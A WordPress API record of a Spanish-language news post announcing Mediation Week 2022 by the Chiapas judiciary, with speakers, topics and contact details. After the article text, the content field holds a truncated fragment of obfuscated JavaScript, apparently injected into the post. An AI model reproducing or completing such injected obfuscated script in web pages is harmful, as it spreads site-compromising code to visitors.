{"id":5369,"date":"2022-09-24T02:40:38","date_gmt":"2022-09-24T02:40:38","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5369"},"modified":"2022-09-24T02:40:39","modified_gmt":"2022-09-24T02:40:39","slug":"convoca-poder-judicial-del-estado-a-semana-de-la-mediacion-2022","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5369","title":{"rendered":"Convoca Poder Judicial del Estado a Semana de la Mediaci\u00f3n 2022"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"663\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/plplplp-663x1024.jpg\" alt=\"\" class=\"wp-image-5370\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/plplplp-663x1024.jpg 663w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/plplplp-194x300.jpg 194w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/plplplp-768x1187.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/plplplp-994x1536.jpg 994w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/plplplp.jpg 1238w\" sizes=\"auto, (max-width: 663px) 100vw, 663px\" \/><\/figure>\n\n\n\n<p>&#8211; En conmemoraci\u00f3n a los 11 a\u00f1os de la implementaci\u00f3n de la Justicia Alternativa en Chiapas.<\/p>\n\n\n\n<p>23 de septiembre del 2022. En continuidad a las acciones de capacitaci\u00f3n instruidas por el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura del Estado, as\u00ed como titular del Poder Judicial del Estado de Chiapas, Guillermo Ramos P\u00e9rez, y derivado de las acciones de la Comisi\u00f3n de Carrera Judicial, el Centro Estatal de Justicia Alternativa (CEJA) invita a participar en la Semana de la Mediaci\u00f3n #PorunaCulturadePaz, del 26 al 30 de septiembre.Esta jornada de actividades, que se realiza en coordinaci\u00f3n con el Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, contempla una serie de conferencias, cursos y talleres tanto virtuales como presenciales, para la actualizaci\u00f3n jur\u00eddica de las servidoras y servidores p\u00fablicos al interior de esta casa de la justicia, as\u00ed como al p\u00fablico en general, con temas como Mediaci\u00f3n Asociativa y Justicia Social, An\u00e1lisis del Conflicto, Construyendo una cultura de paz y la Mediaci\u00f3n Ind\u00edgena, entre otros.La directora general del CEJA, Elisheba Goldhaber Pasillas, indic\u00f3 que esta Semana es para conmemorar los 11 a\u00f1os de la implementaci\u00f3n de la Justicia Alternativa en Chiapas, y con este tipo de actividades se busca abrir espacios con la comunidad jur\u00eddica y acad\u00e9mica, a la vez que se socializan los beneficios de la Mediaci\u00f3n y la Justicia Alternativa con la poblaci\u00f3n usuaria de la justicia, a ra\u00edz de las nuevas posibilidades en las formas de acceder a la justicia, que se generaron desde la Reforma de 2008, con la que se modific\u00f3 la estructura y el aparato judicial.A\u00f1adi\u00f3, que este evento contar\u00e1 con la participaci\u00f3n de ponentes que se han destacado a nivel nacional, como el presidente fundador del Instituto de Mediaci\u00f3n en M\u00e9xico, Jorque Pesqueira Leal; el mediador y especialista en Justicia Restaurativa, H\u00e9ctor Alejandro Valle L\u00f3pez y la directora general del Centro Estatal de Justicia de Hidalgo, Nancy Guti\u00e9rrez Jim\u00e9nez.Cabe destacar que todas las actividades ser\u00e1n gratuitas, las conferencias abiertas al p\u00fablico se transmiten en vivo por la p\u00e1gina oficial de Facebook del Poder Judicial del Estado, mientras que los cursos y conversatorios ser\u00e1n con previo registro o dirigidas \u00fanicamente a especialistas de las subdirecciones del Centro de Justicia Alternativa.Para m\u00e1s informaci\u00f3n se puede visitar la p\u00e1gina www.facebook.com\/PJE.Chiapas donde se encuentra la convocatoria con todas las actividades disponibles para esta Semana de la Mediaci\u00f3n, o al tel\u00e9fono 9616178700 Ext. 8424.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>&#8211; En conmemoraci\u00f3n a los 11 a\u00f1os de la implementaci\u00f3n de la Justicia Alternativa en Chiapas. 23 de septiembre del 2022. En continuidad a las acciones de capacitaci\u00f3n instruidas por el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura del Estado, as\u00ed como titular del Poder Judicial del Estado de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5370,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5369","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5369","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5369"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5369\/revisions"}],"predecessor-version":[{"id":5371,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5369\/revisions\/5371"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5370"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5369"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5369"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5369"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}